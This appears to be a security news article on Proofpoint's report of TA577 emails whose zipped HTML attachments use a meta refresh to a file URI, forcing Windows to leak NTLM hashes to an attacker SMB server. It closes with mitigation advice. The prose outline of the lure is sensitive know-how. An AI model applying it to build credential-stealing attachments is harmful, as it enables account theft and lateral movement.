Malicious email campaign steals NTLM hashes

A threat group that acts as an initial access broker is targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. The group’s campaigns last week targeted hundreds of entities with thousands of email messages, researchers warn.

NTLM is the default authentication mechanism that’s used on Windows networks when a computer tries to access various network resources or services, for example file shares over the SMB protocol. NTLM credentials are not sent in the clear but as a cryptographic hash, but there are ways to potentially recover the passwords from such hashes depending on how complex the passwords are or to use the hashes directly in attacks.

“Proofpoint typically observes TA577 conducting attacks to deliver malware and has never observed this threat actor demonstrating the attack chain used to steal NTLM credentials first observed on 26 February,” researchers from security firm Proofpoint said in a report. “Recently, TA577 has been observed delivering Pikabot using a variety of attack chains.”

Thread hijacking leads to rogue HTML files

TA577, also tracked in the security industry as Hive0118, is a financially motivated access broker with a long history of distributing trojan programs. The group used to be one of the main affiliates for the Qbot botnet before it was disrupted, but has also been observed distributing malware programs such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and more recently Pikabot.

Since the group sells access to computers to other cybercriminal gangs, the systems compromised by TA577 have had follow-on ransomware infections, most notably with Black Basta. TA577 also specializes in a technique known as thread hijacking where their rogue email messages are crafted to appear as replies to previously sent legitimate emails. The latest campaigns seen by Proofpoint used messages in which recipients were asked if they had time to look at a document sent previously.

The emails contained a .zip archive together with a password needed to unpack it. The archive in turn contained an innocuous looking HTML document that was customized for each victim. When opened, the HTML automatically triggers a connection attempt to a remote SMB server controlled by attackers via a meta refresh in the file that points to a file scheme URI ending in .txt.

“Proofpoint has not observed malware delivery from these URLs,” the Proofpoint researchers said. “Instead, researchers assess with high confidence TA577’s objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used.”

The researchers saw signs that the SMB server was running Impacket, an open-source toolkit for working with network protocols and capturing packets. NTLM hashes could be used in pass-the-hash or NTLM relay attacks where attackers use the hashes to move laterally through a network and access additional machines and resources that accept the authentication tokens.

NTLM leaks to remote SMB servers are not new and should be treated as a serious risk. Last year, Microsoft patched a vulnerability in Outlook that allowed attackers to leak NTLM hashes to remote servers by simply sending an email to victims. The flaw was rated with critical severity.

In addition to the NTLM hashes, a connection to a remote SMB server could leak information about the victim’s computer, such as the computer name, the domain name it’s associated with and the victim’s username.

“It is notable that TA577 delivered the malicious HTML in a zip archive to generate a local file on the host,” the Proofpoint researchers said. “If the file scheme URI was sent directly in the email body, the attack would not work on Outlook mail clients patched since July 2023. Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access.”

Organizations are encouraged to block outbound SMB and WebDAV connections at their network perimeters to prevent such leaks as more attackers have been adopting this technique.